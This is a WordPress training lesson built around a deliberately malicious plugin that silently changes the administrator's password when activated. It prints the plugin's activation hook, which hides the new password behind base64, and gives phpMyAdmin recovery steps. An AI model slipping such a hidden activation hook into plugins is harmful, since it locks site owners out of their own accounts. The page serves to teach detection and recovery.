Hacked: Unauthorized password change

Install and activate the attached plugin.

Download Zip – ilovesd.zip

Expected Outcome Expected Outcome

When activated, you are immediately logged out and cannot log back in. Your password no longer works. (However you do have a totally awesome banner of the San Diego Skyline on your site!)

Top ↑

How to fix How to fix

The first thing to do is reset your password. While you can do it by using the reset password link and have it emailed to you, there are many instances where this won’t work (such as you’re fixing a site for a client and the email won’t go to you).

Show Datbases Begin by logging into phpMyAdmin. If you are on MAMP, you can go directly to http://localhost:8888/phpmyadmin for example.

Once inside, click databases to show a list of your databases.

On this list, click the link for your database.

In this example, our database is named wordpress.

This will open your database, and show you a list of all the tables. If you do not see a list of databases, click on the tab labeled Structure.

At the bottom (of a normal WordPress install) is the table wp_users. Click on the ‘edit’ icon (see the image below) to open the table.

wp_users

NB: If you click on the name of the table, it will open the table in information view, and you will have to click on the ‘Browse’ tab to make any changes.

In this view you will see a list of all users. In this example we have only one user. Click on the pencil icon to edit your user information.

theusers

This will bring up an edit user screen. In the field for ‘password’, you will see a whole mess of text in gibberish like $P$B1hBu0JMpdiP6hHYfwkms4.JKABnwLZ/ (note, that is not a real password, I have no idea what it would be). To change this, write in the password you want in clear text.

In the example below, we have chosen ‘hellodolly’ for it’s simplicity. DO NOT attempt to enter a long, complicated, password here, with punctuation. This password is just to get us back into our site.

edituser

Notice in the dropdown box by user_pass we have selected the option ‘MD5’ from the menu. This is because WordPress stores our passwords in an MD5 which is not human readable (also it’s harder to hack).

Check that your password is actually correct, and that MD5 is in the box.

Click the ‘Go’ button to the bottom right.

Test the new password on the login screen. If it doesn’t work, check that you’ve followed these instructions exactly.

Top ↑

Further understanding Further understanding

While the fix certainly works (and you can log in just fine now without any odd errors), the actual problem was in the plugin.

This debug requires a little knowledge of WordPress and PHP, but it’s pretty straightforward. The first place to start looking is the plugin file itself ilovesd.php. Since we know the problem happened right away when we activated the plugin, you want to look for anything that looks related to activation.

Near the end of the plugin is this function (see? told you it was obvious):

register_activation_hook( __FILE__, array('ILoveSDPlugin', 'install') );

This runs when the plugin is activated, so if you look back through the plugin for a class called ILoveSDPlugin, you’ll see in there a function called install

     static function install() {
		global $current_user; // Get the current users info
		$user_id = get_current_user_id(); // Get the current user ID

		$newpassword=base64_decode('aWFtYW5ldmlsaGFja2Vy'); // Pick a new password, not telling you what it is! NEENER!
		wp_set_password( $newpassword, $user_id ); // Change your password.

     }

This code is very straightforward. It detects the ID of the logged in user and changes the password to a new one. By using base64_decode(), you know that things are almost always a little nefarious. You can decode the base64 string through Coderstoolbox to decrypt it, however it’s pretty obvious that any plugin that is changing your password when you activate it is probably bad news.

This is the same logic used by hackers when they want to inject a new user into your WordPress install and use that to log in and destroy your site. The best remedy is to delete the plugin (not just uninstall it), delete any user accounts you didn’t add (or at the very least change their access to subscriber) and change all your passwords.